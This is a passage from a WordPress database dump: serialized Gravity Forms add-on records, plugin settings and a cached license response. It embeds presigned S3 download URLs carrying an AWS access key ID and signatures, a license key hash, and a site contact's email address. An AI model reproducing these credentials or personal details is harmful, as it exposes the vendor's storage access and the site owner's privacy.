8\";s:14:\"version_latest\";s:3:\"2.8\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/freshbooks/gravityformsfreshbooks_2.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=GLVPojy8sJ%2BPD%2F26Z9rUmrjzOpc%3D\";s:10:\"url_latest\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/freshbooks/gravityformsfreshbooks_2.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=GLVPojy8sJ%2BPD%2F26Z9rUmrjzOpc%3D\";}s:23:\"gravityformsgeolocation\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.0\";s:14:\"version_latest\";s:3:\"1.0\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/geolocation/gravityformsgeolocation_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=X8XL0EOb5XaZniFcUR1aEmj71Cg%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/geolocation/gravityformsgeolocation_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=X8XL0EOb5XaZniFcUR1aEmj71Cg%3D\";}s:23:\"gravityformsgetresponse\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.7\";s:14:\"version_latest\";s:5:\"1.7.1\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/getresponse/gravityformsgetresponse_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=TDIfhbh76HhCfGUf%2BxwK1I7WlS8%3D\";s:10:\"url_latest\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/getresponse/gravityformsgetresponse_1.7.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=VQ6am793wWaYRMhF58FGHcMLZTg%3D\";}s:27:\"gravityformsgoogleanalytics\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.2\";s:14:\"version_latest\";s:5:\"1.2.1\";s:3:\"url\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/googleanalytics/gravityformsgoogleanalytics_1.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=IKHq9u1UrqMseoBMSlIGpVSgCf0%3D\";s:10:\"url_latest\";s:194:\"https://s3.amazonaws.com/gravityforms/addons/googleanalytics/gravityformsgoogleanalytics_1.2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=KeZ30VbRy3V5tmOb8PhUmkcTE1I%3D\";}s:21:\"gravityformsgutenberg\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:10:\"1.0-rc-1.4\";s:14:\"version_latest\";s:10:\"1.0-rc-1.5\";s:3:\"url\";s:187:\"https://s3.amazonaws.com/gravityforms/addons/gutenberg/gravityformsgutenberg_1.0-rc-1.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=7zBRCO6pjjUgE0zZeXUZsmbqaDU%3D\";s:10:\"url_latest\";s:187:\"https://s3.amazonaws.com/gravityforms/addons/gutenberg/gravityformsgutenberg_1.0-rc-1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=NA4DdRmCBmACh3x8mVRRKN4VGzI%3D\";}s:21:\"gravityformshelpscout\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.1\";s:14:\"version_latest\";s:5:\"2.1.1\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/helpscout/gravityformshelpscout_2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=waJQxspwp6d2khKacPtQS2CiqZ8%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/helpscout/gravityformshelpscout_2.1.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=t5ZOJZR8fSybmJEZcJBYiV%2FXYGo%3D\";}s:20:\"gravityformshighrise\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:3:\"1.3\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/highrise/gravityformshighrise_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=izlMOTRsDFNy5DHUXCpxPg6kt8Q%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/highrise/gravityformshighrise_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=izlMOTRsDFNy5DHUXCpxPg6kt8Q%3D\";}s:19:\"gravityformshipchat\";a:3:{s:12:\"is_available\";b:0;s:7:\"version\";s:3:\"1.2\";s:14:\"version_latest\";s:3:\"1.2\";}s:19:\"gravityformshubspot\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.9\";s:14:\"version_latest\";s:3:\"1.9\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/hubspot/gravityformshubspot_1.9.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=fehlPT4yVbnyl3UHs%2Fynz0ExUhQ%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/hubspot/gravityformshubspot_1.9.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=fehlPT4yVbnyl3UHs%2Fynz0ExUhQ%3D\";}s:20:\"gravityformsicontact\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:5:\"1.5.1\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/icontact/gravityformsicontact_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=EKnK6q0xIOWKUJjCuX7FVRFqvkU%3D\";s:10:\"url_latest\";s:182:\"https://s3.amazonaws.com/gravityforms/addons/icontact/gravityformsicontact_1.5.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Zt21xJUydpUL7%2FI7JXAGk3yYUzI%3D\";}s:19:\"gravityformslogging\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:5:\"1.3.1\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/logging/gravityformslogging_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Wi0mPXhVP%2FzWfo69Abo%2Fj2JHvkg%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/logging/gravityformslogging_1.3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=CBvtfv6D3vV%2BezC6mAxTcstV2W4%3D\";}s:19:\"gravityformsmadmimi\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.4\";s:14:\"version_latest\";s:5:\"1.4.1\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/madmimi/gravityformsmadmimi_1.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=iFke%2BIL6KVBA%2F%2BAuapxeL8Bu%2BPs%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/madmimi/gravityformsmadmimi_1.4.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=ggrGuNxfvl2XPKEOGMZVtcmr43Y%3D\";}s:21:\"gravityformsmailchimp\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"5.2\";s:14:\"version_latest\";s:5:\"5.2.0\";s:3:\"url\";s:188:\"https://s3.amazonaws.com/gravityforms/addons/mailchimp/gravityformsmailchimp_5.2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2B9vsm%2B0RK9o7gn%2FVjiFovolAJs8%3D\";s:10:\"url_latest\";s:188:\"https://s3.amazonaws.com/gravityforms/addons/mailchimp/gravityformsmailchimp_5.2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2B9vsm%2B0RK9o7gn%2FVjiFovolAJs8%3D\";}s:19:\"gravityformsmailgun\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:5:\"1.3.1\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/mailgun/gravityformsmailgun_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=hDx5nIteQou6nY6loi85rL3yxKs%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/mailgun/gravityformsmailgun_1.3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=wL2nQn1Ve81GZ7Q6uxDFIxUzl1w%3D\";}s:22:\"gravityformsmoderation\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.0\";s:14:\"version_latest\";s:3:\"1.0\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/moderation/gravityformsmoderation_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=OVpA53WVe%2Fvs5RM5a7qmYggKx5g%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/moderation/gravityformsmoderation_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=OVpA53WVe%2Fvs5RM5a7qmYggKx5g%3D\";}s:18:\"gravityformsmollie\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:3:\"1.3\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/mollie/gravityformsmollie_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=WoA6wI2X8MHN4j2JumkVLmK1QbM%3D\";s:10:\"url_latest\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/mollie/gravityformsmollie_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=WoA6wI2X8MHN4j2JumkVLmK1QbM%3D\";}s:26:\"gravityformspartialentries\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.7\";s:14:\"version_latest\";s:3:\"1.7\";s:3:\"url\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/partialentries/gravityformspartialentries_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=lYCgv6VkuomE%2FTtebaVB8gEbZYM%3D\";s:10:\"url_latest\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/partialentries/gravityformspartialentries_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=lYCgv6VkuomE%2FTtebaVB8gEbZYM%3D\";}s:18:\"gravityformspaypal\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.5\";s:14:\"version_latest\";s:3:\"3.5\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/paypal/gravityformspaypal_3.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=zbkrTvh5f7Qxp%2FNUpCDbB4PiNVs%3D\";s:10:\"url_latest\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/paypal/gravityformspaypal_3.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=zbkrTvh5f7Qxp%2FNUpCDbB4PiNVs%3D\";}s:33:\"gravityformspaypalexpresscheckout\";a:3:{s:12:\"is_available\";b:0;s:7:\"version\";s:0:\"\";s:14:\"version_latest\";N;}s:29:\"gravityformspaypalpaymentspro\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.7\";s:14:\"version_latest\";s:3:\"2.7\";s:3:\"url\";s:198:\"https://s3.amazonaws.com/gravityforms/addons/paypalpaymentspro/gravityformspaypalpaymentspro_2.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2FASVgCvglfpHcxCIjhex2AdUZy0%3D\";s:10:\"url_latest\";s:198:\"https://s3.amazonaws.com/gravityforms/addons/paypalpaymentspro/gravityformspaypalpaymentspro_2.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2FASVgCvglfpHcxCIjhex2AdUZy0%3D\";}s:21:\"gravityformspaypalpro\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:5:\"1.8.1\";s:14:\"version_latest\";s:5:\"1.8.4\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/paypalpro/gravityformspaypalpro_1.8.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=ed%2F9CGsdX01L8t%2FtIiplZQvzfTg%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/paypalpro/gravityformspaypalpro_1.8.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=cEcXyW2ANFFYBQZ6GSzq3Tb%2BtRQ%3D\";}s:20:\"gravityformspicatcha\";a:3:{s:12:\"is_available\";b:0;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:3:\"2.0\";}s:16:\"gravityformspipe\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.2\";s:14:\"version_latest\";s:5:\"1.3.1\";s:3:\"url\";s:172:\"https://s3.amazonaws.com/gravityforms/addons/pipe/gravityformspipe_1.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=2rBqr3rP2bVTT3kCRA0kiKl%2FI7I%3D\";s:10:\"url_latest\";s:172:\"https://s3.amazonaws.com/gravityforms/addons/pipe/gravityformspipe_1.3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=S9ecSW8A9ezGESM46hza4nfL1bI%3D\";}s:17:\"gravityformspolls\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.0\";s:14:\"version_latest\";s:5:\"4.0.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/polls/gravityformspolls_4.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=nHjVC%2BxSf7Zil742lD4bQgSEFJg%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/polls/gravityformspolls_4.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=9Jf%2BbbxnDmEdIvycmliE%2FtPXPgw%3D\";}s:20:\"gravityformspostmark\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:3:\"1.3\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/postmark/gravityformspostmark_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=vI%2FWnSAxE0vT6QLIfrApucv1nFo%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/postmark/gravityformspostmark_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=vI%2FWnSAxE0vT6QLIfrApucv1nFo%3D\";}s:16:\"gravityformsppcp\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.5\";s:14:\"version_latest\";s:3:\"2.5\";s:3:\"url\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/ppcp/gravityformsppcp_2.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=87tfoPHdyirFEEWZwmXfOYmIrCU%3D\";s:10:\"url_latest\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/ppcp/gravityformsppcp_2.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=87tfoPHdyirFEEWZwmXfOYmIrCU%3D\";}s:16:\"gravityformsquiz\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.0\";s:14:\"version_latest\";s:3:\"4.0\";s:3:\"url\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/quiz/gravityformsquiz_4.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=atv8NxvdbbXullUioklwUUKWyZA%3D\";s:10:\"url_latest\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/quiz/gravityformsquiz_4.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=atv8NxvdbbXullUioklwUUKWyZA%3D\";}s:21:\"gravityformsrecaptcha\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.1\";s:14:\"version_latest\";s:5:\"1.1.2\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/recaptcha/gravityformsrecaptcha_1.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Mu4xilQxiLvUHgG3OfPgTweTkcI%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/recaptcha/gravityformsrecaptcha_1.1.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=OQjy6b0gX0UtvkgVUPlF9k%2FB2Qo%3D\";}s:19:\"gravityformsrestapi\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:10:\"2.0-beta-2\";s:14:\"version_latest\";s:10:\"2.0-beta-2\";s:3:\"url\";s:183:\"https://s3.amazonaws.com/gravityforms/addons/restapi/gravityformsrestapi_2.0-beta-2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Nc6K7sGqM7AFAp8blbgE0khI8C0%3D\";s:10:\"url_latest\";s:183:\"https://s3.amazonaws.com/gravityforms/addons/restapi/gravityformsrestapi_2.0-beta-2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Nc6K7sGqM7AFAp8blbgE0khI8C0%3D\";}s:20:\"gravityformssendgrid\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:3:\"1.5\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/sendgrid/gravityformssendgrid_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=auhJLZQ5lOmrzLfR10Rvqsv5X2s%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/sendgrid/gravityformssendgrid_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=auhJLZQ5lOmrzLfR10Rvqsv5X2s%3D\";}s:21:\"gravityformssignature\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.4\";s:14:\"version_latest\";s:5:\"4.4.1\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/signature/gravityformssignature_4.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=HcPGq%2BDqQz2Q72BhVzQLS4e%2Bee0%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/signature/gravityformssignature_4.4.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=t2ImOZoe1tRYi1PUhITv8Ed%2BvGU%3D\";}s:17:\"gravityformsslack\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:5:\"2.0.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/slack/gravityformsslack_2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=ITy1yXw7USXzwyTC275xsZ%2BH2o8%3D\";s:10:\"url_latest\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/slack/gravityformsslack_2.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=OPBq4WdR1N60qYfUBtXrKBwX05g%3D\";}s:18:\"gravityformssquare\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.8\";s:14:\"version_latest\";s:5:\"1.8.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/square/gravityformssquare_1.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=NG8MQFqB2xmEDOkJ2uYxC20vvkk%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/square/gravityformssquare_1.8.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=2npcbO%2FRQqYPwX%2FnRq9EuKsmaHk%3D\";}s:18:\"gravityformsstripe\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.3\";s:14:\"version_latest\";s:3:\"4.3\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/stripe/gravityformsstripe_4.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=qx0khrDuY51nm2bL3Vlj7r50PnE%3D\";s:10:\"url_latest\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/stripe/gravityformsstripe_4.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=qx0khrDuY51nm2bL3Vlj7r50PnE%3D\";}s:18:\"gravityformssurvey\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.8\";s:14:\"version_latest\";s:3:\"3.8\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/survey/gravityformssurvey_3.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=d%2FXJmQtwDV5RWzErqevreYynCrk%3D\";s:10:\"url_latest\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/survey/gravityformssurvey_3.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=d%2FXJmQtwDV5RWzErqevreYynCrk%3D\";}s:18:\"gravityformstrello\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:5:\"2.0.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/trello/gravityformstrello_2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Wdir2YmYftmQ4W46Ml2wBje8yGA%3D\";s:10:\"url_latest\";s:182:\"https://s3.amazonaws.com/gravityforms/addons/trello/gravityformstrello_2.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=YeDGTE%2FqacnvIKD%2F%2BHkVoBnj6Dg%3D\";}s:18:\"gravityformstwilio\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.9\";s:14:\"version_latest\";s:5:\"2.9.1\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/twilio/gravityformstwilio_2.9.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=kPH0%2FhtlOE%2F6DFFzXCf2MvBSLtc%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/twilio/gravityformstwilio_2.9.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=gz7zMKhqEqbtqyiR4q4Gn7tA7%2Fk%3D\";}s:28:\"gravityformsuserregistration\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"5.1\";s:14:\"version_latest\";s:3:\"5.1\";s:3:\"url\";s:196:\"https://s3.amazonaws.com/gravityforms/addons/userregistration/gravityformsuserregistration_5.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=MYLW5j%2FhiLSFduo4utBmPXQBJu0%3D\";s:10:\"url_latest\";s:196:\"https://s3.amazonaws.com/gravityforms/addons/userregistration/gravityformsuserregistration_5.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=MYLW5j%2FhiLSFduo4utBmPXQBJu0%3D\";}s:20:\"gravityformswebhooks\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:3:\"1.5\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/webhooks/gravityformswebhooks_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=lKgjfApqkWS9SVL%2FjRlKA3euUnE%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/webhooks/gravityformswebhooks_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=lKgjfApqkWS9SVL%2FjRlKA3euUnE%3D\";}s:18:\"gravityformszapier\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"4.2\";s:14:\"version_latest\";s:5:\"4.2.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/zapier/gravityformszapier_4.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=6dMBYfN1KDeI1wX30YiyN1DjjMw%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/zapier/gravityformszapier_4.2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=IGutV5Noc9JHbNa%2BpKsy1ImqX88%3D\";}s:19:\"gravityformszohocrm\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:5:\"2.0.1\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/zohocrm/gravityformszohocrm_2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=HPJ6GSRYWYYGmrRwtIdmVZDUFLo%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/zohocrm/gravityformszohocrm_2.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=yIlbME6zM2I1ERWPf0%2B6Ys3ofek%3D\";}}s:9:\"is_active\";s:1:\"1\";s:12:\"product_code\";s:5:\"GFDEV\";s:14:\"version_latest\";s:5:\"2.7.4\";s:10:\"url_latest\";s:165:\"https://s3.amazonaws.com/gravityforms/releases/gravityforms_2.7.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=gqiHdODjV3FAmYl2HYC0r4Eg8cs%3D\";s:9:\"timestamp\";i:1681902658;}','no'),(3848,'et-support-center-safe-mode-verify','99e4b9e944f5b97841976132a32f6ec3','yes'),(9180,'gravityformsaddon_gravityformswebapi_version','1.0','yes'),(9181,'widget_gform_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(8433,'_cerber_report','a:2:{i:0;i:1681722761;i:1;a:1:{s:5:\"email\";s:24:\"terra@smcorridornews.com\";}}','no'),(9407,'gf_previous_db_version','2.7.3','yes'),(9408,'gf_upgrade_lock','','yes'),(9413,'gf_rest_api_db_version','2.7.4','yes'),(9409,'gform_sticky_admin_messages','a:0:{}','yes'),(9410,'auto_update_plugins','a:1:{i:0;s:29:\"gravityforms/gravityforms.php\";}','no'),(158,'recently_activated','a:0:{}','yes'),(19052,'_transient_timeout_GFCache_01a35a15ae7468405a10ae86938596f7','1681989059','no'),(19053,'_transient_GFCache_01a35a15ae7468405a10ae86938596f7','s:913:\"O:59:\"Gravity_Forms\\Gravity_Forms\\License\\GF_License_API_Response\":5:{s:4:\"data\";a:1:{i:0;a:19:{s:15:\"license_key_md5\";s:32:\"55648090f048cabf2a0a149489e18f45\";s:12:\"date_created\";s:19:\"2014-09-20 18:19:08\";s:12:\"date_expires\";s:19:\"2023-06-11 16:00:00\";s:12:\"renewal_date\";s:19:\"2023-05-12 16:00:00\";s:9:\"is_active\";s:1:\"1\";s:24:\"is_subscription_canceled\";s:1:\"0\";s:12:\"product_code\";s:5:\"GFDEV\";s:12:\"product_name\";s:31:\"Gravity Forms Developer 